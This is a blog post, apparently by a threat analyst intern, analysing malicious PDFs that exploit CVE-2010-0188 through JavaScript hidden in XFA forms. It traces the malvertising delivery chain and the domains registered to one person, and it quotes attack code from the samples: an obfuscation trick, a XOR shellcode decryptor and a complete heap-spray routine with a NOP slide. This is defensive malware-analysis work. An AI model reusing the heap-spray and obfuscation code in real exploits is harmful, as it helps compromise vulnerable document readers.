Navigation
« Analyzing CVE-2010-0188 exploits: Context aware malware (Part 2) | Main | Using the Wordpress OpenID plugin for Evil »
Friday
Aug202010

Analyzing CVE-2010-0188 exploits: The Legend of Pat Casey (Part 1)

Introduction

I'm going to call this: The Legend of Pat Casey. Keep reading to find out why, but I'm pretty sure there are no villains involved named Pat, nor Casey. The story begins in late June into early July when I became interested in malware analysis and subsequently, reverse engineering.

As a threat analyst intern I nabbed a few malicious PDF samples and began researching what made them vulnerable. Using Wepawet I saw that most samples used JavaScript as a springboard either to hide their intent, or exploit a vulnerability. I thought to myself, awesome, I know JavaScript fairly well, let's investigate. "Let me see if I can mimic Wepawet's analysis and automatic PDF parsing." Long story shortened, I was able to pick apart a ton of samples. Interestingly, most seemed related. By related I mean, originating from the same network, using the same vector for download, and exploiting the same vulnerabilities. I documented most of my research in a recent article "Exploring Recent PDF Exploits". I ended the article, and my personal research, at Windows shellcode. At that point I was in over my head with no clear direction on how to start picking apart the shellcode. Sure, I could open it in IDA, but that afforded me very little. I needed to learn more about Windows, and Windows programming before I could continue.

Well here I am a month later, still obsessing over every new malicious PDF I can get my hands on. I know a tad bit more about shellcode, reverse code engineering, and PDF markup. Good thing, because this month I encountered another set of related PDFs. It took me a bit to uncover the vulnerability as it used XFA and Acrobat Forms (I knew neither). The JavaScript was embedded in an XFA form. It manipulated a field using a reference to an embedded element name. A quick search on Google led me to: CVE-2010-0188, a vulnerability in LibTIFF. There are some cool analysis reports involving this vulnerability. If you're interested see BugiX, Fortinet, and for a proof of concept BugiX (again). My search terms included "XFA, ImageEdit, and AcroForm JavaScript".

Didier Stevens' PDFid will not detect calls to /JS, or /JavaScript as there are none. The JavaScript here is embedded in an XFA form template and is called when the form is initialized:

 

<field h="65mm" name="field_name" w="85mm" x="53.6501mm" y="88.6499mm">
  <event activity="initialize" name="event_name">
    
  </event>
  <ui><imageEdit/></ui>
</field>

 

The JavaScript will set the "rawValue" of "field_name" to a Tiff with an invalid parameter triggering CVE-2010-0188. However, like before as outlined in my previous article, it will have heap sprayed shellcode.

The samples I analyzed were again related, same network, same infection vector, same exploitation format. And, the infection vector was the same as the series from July. A malicious malvertizer will redirect the victim to a [a-z]{5}.com formatted domain (there are some which don't fit this standard). This page will probe the victim for Internet Explorer, if the check fails you will be redirected to Google. It does this through a JavaScript file called common.js. This script then enumerates plugins for your web browser and then delivers either a HCP exploit, PDF exploit, JAR exploit, or Flash exploit. But it gets cooler, here's the complete download process:

La La La, browsing some news site -> SEO delivers a malicious advertisement (a free .co.cc registration) -> Some 5-letter .com domain pointing to an IP in Latvia, serving an HTML/JS file (probe) -> a malicious PDF, but only if you have Adobe Reader installed. (how nice)

The .co.cc redirecting to a 5-letter .com domain was also familiar. Actually, if you do a whois on any one of these new (for August) domains you'll see they're registered to a (the only and only) Pat Casey. The same Pat Casey who registered the 5/6-letter .com domains in July (they used the same email address). I believe this is some sort of exploit kit or malware as a service as there seems to be embedded customer tracking within the .co.cc redirections. Either way, Pat Casey's August PDF exploits are much more fun than July's. (An exploit kit update perhaps.)

Deobfuscating the JavaScript

Figure 1: The PDF Layout

I do not know much about PDF syntax, but looking at some of the Objects, one can generate a simple idea of what's happening (Figure 1). I did not dwell very long on understanding every bit of PDF markup, but enough to realize that the JavaScript contained in the XFA initialize event was malicious. I like deobfuscating the JavaScript myself since it's basically an easy pattern matching game. It took about 20 minutes to realize that the JavaScript was preforming a heap spray with shellcode, followed by a setter call for rawValue to what seemed to be the <ImageEdit> element. It's quite cool how the vulnerable code was hidden. It was was distributed amongst variables then joined in the end. Of course the "join" method was also hidden within a string of text and decoded with a regular expression which removed the junk. Here's an example:

 

var1 = func26('qrFeFtFuUrEnz zuHnbeEsUcHaZpqeD(UaD)', func6('bEFqHZDUz'));

 

Where removing all "bEFqHZDUz" characters will reveal "return unescape(a)". The obfuscation is not smart, as you can see if you remove every other character you're finished. A simple Python script can parse calls to 'func6' and 'decoded' this. In the example 'func6' pads and "regex" and 'func26' pads a "function (a) {". This is how vulnerable Tiff data is hidden, but what about the shellcode? Well Mr. Casey is now interested in encryption so he added a simple Vigenère cipher using XOR:

 

function decryptString(string1, key) {
    retString = '';
    for (i = 0; i &lt; string1.length; i++) {
        charCode = string1.charCodeAt(i);
        charKey = key.charCodeAt(i % key.length);
        retString += String.fromCharCode(charCode ^ charKey);
    }
    return retString;
}

shellcode = "long hex value containing encoded shellcode";
shellcode = decryptString(hex2dec(shellcode), "shortkey");

 

Then like before, we can spray the heap by translating the decrypted shellcode into unicode and allocating large sections of memory filled with a NOP slide to shellcode:

 

function tounicode(input) {
    retString = '';
    for (i = 0; i &lt;  input.length; i += 2) {
        retString += '%u';
        retString += tohex(input.charCodeAt(i + 1));
        retString += tohex(input.charCodeAt(i));

    }
    return retString;
}

function makehuge(input, size) {
    while (input.length * 2 &lt; size) {
        input += input;
    }
    input = input.substr(0, size / 2);
    return input;

}

function heapspray(input) {
    input = unescape(input);
    len = input.length * 2;

    nop = unescape('%u' + '9090');
    slide = makehuge(nop, 8192 - len);

    newcode = input + slide;
    newcode = makehuge(newcode, 524144);

    /* allocate a ton of it! */
    for (i = 0; i &lt; 400; i++) {
        codeArray[i] = newcode.substr(0, newcode.length - 1) + input;
    }
}

heapspray(tounicode(shellcode));

 

At the time of writing: Wepawet was identifying this PDF as benign. Though at this point a dynamic analysis should pick up on the allocated shellcode.

Investigating the Attack Vector

Pat Casey registration during 8/2010

Pat Casey registration during 6/2010

This form of exploit (XFA, obfuscation techniques) was new to me, but the attack vector and domain format were the same. The whois registration for the new domains was also exact. Last time the .coms were registered to an AS from Moldova, now they were coming from an AS in Latvia (AS6851) more specifically from the 85.234.190.0/23 network. I was now determined to wrap my head around these attacks. I ran the PDF on a vulnerable version of Adobe Reader while pointing my VM to INetSim running on the host. I saw, through Wireshark, that the shellcode is used as a bootstrap to launch an executable downloaded from an embedded URI (in the shellcode). The same technique used in June and July.

The next step in my analysis was to download the executable and find it's purpose. Hopefully it would reveal the goal of the exploit pack or at least provide a signature to help identify what type of malware Pat Casey is distributing.

This was where I ran into a road-block. I tried to download the PE file, but instead I received a small chunk of HTML that would redirect a web browser to Google. I was determined that it was an anti-analysis technique. I thought the author was expiring the URI after a set amount of time. (I said I was determined right?) So I wrote a script to send me email alerts whenever a new domain was submitted to clean-MX for AS6851. My plan was to immediately follow the email alert with a download of the page, then download the PDF, run it, extract the downloaded URI pointing to the PE download, and download the file quickly. It took a few days until I an email alert fired while I wasn't at work, but alas, after 20 minutes of fooling around, the link was again bad. (Was I really racing against time?)

During the next part I'll walk through a bit of a learning experience using Olly to decipher the shellcode, along with the solution to my race-against-time. I'll talk a bit about Pat Casey's anti-analysis techniques and hopefully reveal more information on the Exploit pack.

To be continued...

Reader Comments

There are no comments for this journal entry. To create a new comment, use the form below.

PostPost a New Comment

Enter your information below to add a new comment.

My response is on my own website »
Author Email (optional):
Author URL (optional):
Post:
 
All HTML will be escaped. Hyperlinks will be created for URLs automatically.